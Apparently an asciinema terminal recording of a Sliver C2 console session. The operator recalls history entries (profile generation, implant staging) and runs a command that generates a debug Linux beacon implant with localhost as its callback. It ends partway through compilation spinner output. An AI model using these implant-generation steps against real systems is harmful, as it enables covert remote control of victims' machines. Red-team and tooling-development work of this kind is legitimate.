sta\u001b[48;05;244mge\u001b[0m\u001b[m -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m242 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m240 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m -c zlib linuxImplant\u001b[0m "] +[10.649035, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m239 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m238 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m236 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m235 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m -c zlib\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m234 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m232 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m231 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m224 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate -h\u001b[0m "] +[10.649226, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m221 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m219 \u001b[22mimplants sta\u001b[48;05;244mge\u001b[0m\u001b[m\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m217 \u001b[22mimplants sta\u001b[48;05;244mge\u001b[0m\u001b[m\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m210 \u001b[22mimplants sta\u001b[48;05;244mge\u001b[0m\u001b[m\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m207 \u001b[22mimplants sta\u001b[48;05;244mge\u001b[0m\u001b[m\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m204 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate implant2\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m203 \u001b[22mimplants sta\u001b[48;05;244mge\u001b[0m\u001b[m\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m194 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate implant1\u001b"] +[10.651504, "o", "[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m156 \u001b[22m\u001b[48;05;244mge\u001b[0m\u001b[mnerate beacon -b localhost --skip-symbols --debug -j 5 -S 15 --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m154 \u001b[22m\u001b[48;05;244mge\u001b[0m\u001b[mnerate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m153 \u001b[22m\u001b[48;05;244mge\u001b[0m\u001b[mnerate beacon\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m152 \u001b[22m\u001b[48;05;244mge\u001b[0m\u001b[mnerate beacon -b localhost --debug --skip-symbols --seconds 15\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m151 \u001b[22m\u001b[48;05;244mge\u001b[0m\u001b[mnerate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[2m\u001b[33m 2 more completion rows... (scroll down to show)\u001b[0m\u001b[0J\u001b[272D\u001b[29A\u001b[1A\u001b[1A\u001b[88D\u001b[9C\u001b[272D\u001b[88C\u001b[?25h"] +[10.829126, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.837811, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.838715, "o", "\u001b[1m\u001b[36mserver history (inc-search): \u001b[0m\u001b[1mgen\u001b[0m_\u001b[0K\r\r\n\u001b[0K\u001b[0m"] +[10.841145, "o", "\u001b[0K\u001b[48;05;255m\u001b[1;30m\u001b[2m310 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m307 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m258 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m238 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m236 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m231 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m224 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m221 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate -h\u001b[0m "] +[10.841763, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m204 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate implant2\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m194 \u001b[22mprofiles \u001b[48;05;244mgen\u001b[0m\u001b[merate implant1\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m156 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -b localhost --skip-symbols --debug -j 5 -S 15 --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m154 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m153 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m152 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -b localhost --debug --skip-symbols --seconds 15\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m151 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m150 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -b localhost --skip-symbols --debug"] +[10.841831, "o", "\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m146 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate beacon -b localhost --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m145 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m88 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m61 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m45 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b locahost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m38 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m26 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --debug --skip-symbols --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m21 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --deb"] +[10.841873, "o", "ug --skip-symbols\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m14 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate -b localhost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m3 \u001b[22m\u001b[48;05;244mgen\u001b[0m\u001b[merate --skip-symbols --os linux -b localhost --debug\u001b[0m \u001b[0m\u001b[0K\u001b[0J\u001b[272D\u001b[25A"] +[10.842556, "o", "\u001b[1A\u001b[1A\u001b[88D\u001b[9C\u001b[272D\u001b[88C\u001b[?25h"] +[10.873979, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.875574, "o", "\u001b[6n"] +[10.881897, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.883943, "o", "\u001b[1m\u001b[36mserver history (inc-search): \u001b[0m\u001b[1mgene\u001b[0m_\u001b[0K\r\r\n\u001b[0K\u001b[0m"] +[10.884691, "o", "\u001b[0K\u001b[48;05;255m\u001b[1;30m\u001b[2m310 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m307 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m258 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m238 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m236 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m231 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m224 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m221 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate -h\u001b[0m "] +[10.884977, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m204 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate implant2\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m194 \u001b[22mprofiles \u001b[48;05;244mgene\u001b[0m\u001b[mrate implant1\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m156 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -b localhost --skip-symbols --debug -j 5 -S 15 --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m154 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m153 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m152 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -b localhost --debug --skip-symbols --seconds 15\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m151 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m150 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -b localhost --skip-symbols --debug"] +[10.885092, "o", "\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m146 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate beacon -b localhost --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m145 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m88 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m61 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m45 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b locahost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m38 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m26 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --debug --skip-symbols --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m21 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --deb"] +[10.886217, "o", "ug --skip-symbols\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m14 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate -b localhost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m3 \u001b[22m\u001b[48;05;244mgene\u001b[0m\u001b[mrate --skip-symbols --os linux -b localhost --debug\u001b[0m \u001b[0m\u001b[0K\u001b[0J\u001b[272D\u001b[25A"] +[10.88645, "o", "\u001b[1A\u001b[1A\u001b[88D\u001b[9C\u001b[272D\u001b[88C\u001b[?25h"] +[11.066897, "o", "\u001b[?25l\u001b[272D"] +[11.070735, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.079679, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.081536, "o", "\u001b[1m\u001b[36mserver history (inc-search): \u001b[0m\u001b[1mgener\u001b[0m_\u001b[0K\r\r\n\u001b[0K\u001b[0m"] +[11.083793, "o", "\u001b[0K\u001b[48;05;255m\u001b[1;30m\u001b[2m310 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m307 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m258 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m238 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m236 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m231 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m224 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m221 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate -h\u001b[0m "] +[11.08465, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m204 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate implant2\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m194 \u001b[22mprofiles \u001b[48;05;244mgener\u001b[0m\u001b[mate implant1\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m156 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -b localhost --skip-symbols --debug -j 5 -S 15 --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m154 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m153 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m152 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -b localhost --debug --skip-symbols --seconds 15\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m151 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m150 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -b localhost --skip-symbols --debug"] +[11.085571, "o", "\u001b[0m \u001b[0m\u001b[0K\r"] +[11.086578, "o", "\r\n\u001b[m\u001b[2m146 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate beacon -b localhost --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m145 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m88 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m61 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --os linux --skip-symbols --debug\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m45 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b locahost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m38 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m26 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --debug --skip-symbols --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m21 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --debug --skip-symbols\u001b[0m "] +[11.087019, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m14 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate -b localhost --skip-symbols --debug --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m3 \u001b[22m\u001b[48;05;244mgener\u001b[0m\u001b[mate --skip-symbols --os linux -b localhost --debug\u001b[0m \u001b[0m\u001b[0K\u001b[0J\u001b[272D\u001b[25A"] +[11.088657, "o", "\u001b[1A\u001b[1A\u001b[88D\u001b[9C\u001b[272D\u001b[88C\u001b[?25h"] +[13.132654, "o", "\u001b[1 q\u001b[88D\u001b[9C\u001b[6n"] +[13.144997, "o", "\u001b[272D\u001b[88C\u001b[0J\u001b[272D\r\r\n"] +[13.146633, "o", "\u001b[0 q\r\n"] +[13.163829, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mGenerating new linux/amd64 beacon implant binary (1m0s)\r\n"] +[13.266564, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[13.367604, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[13.468205, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[13.56865, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[13.670654, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[13.775009, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[13.875673, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[13.980192, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[14.080607, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[14.182043, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[14.286749, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[14.388687, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[14.489389, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[14.592853, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[14.69579, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[14.797747, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[14.89881, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[14.99907, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[15.099155, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[15.199718, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[15.301844, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[15.400693, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[15.501925, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[15.602699, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[15.703195, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[15.806347, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[15.907432, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[16.007596, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[16.107915, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[16.210775, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[16.311948, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[16.413473, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[16.512881, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[16.614219, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[16.71476, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[16.840076, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[16.916564, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[17.017613, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[17.118565, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[17.219654, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[17.320772, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[17.421508, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[17.522366, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[17.622827, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[17.723849, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[17.824878, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[17.925809, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[18.026134, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[18.127197, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[18.228757, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[18.329262, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[18.43072, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[18.532921, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[18.634189, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[18.735237, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[18.83613, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[18.941467, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[19.042585, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[19.144166, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[19.245445, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[19.345657, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[19.447133, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[19.548171, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[19.647948, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[19.748565, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[19.849248, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[19.950498, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[20.051241, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[20.152222, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[20.255517, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[20.356137, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[20.456888, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[20.558167, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[20.658768, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[20.758961, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[20.859802, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[20.960413, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[21.06133, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[21.162318, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[21.263139, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[21.365772, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[21.470163, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[21.573427, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[21.678021, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[21.779433, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[21.879665, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[21.980575, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[22.081145, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[22.18192, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[22.282818, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[22.383597, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[22.48474, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[22.585755, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[22.686843, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[22.790361, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[22.891124, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[22.992712, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[23.093707, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[23.197777, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[23.300986, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[23.401728, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[23.504799, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[23.606212, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[23.706866, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[23.807765, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[23.908014, "o", 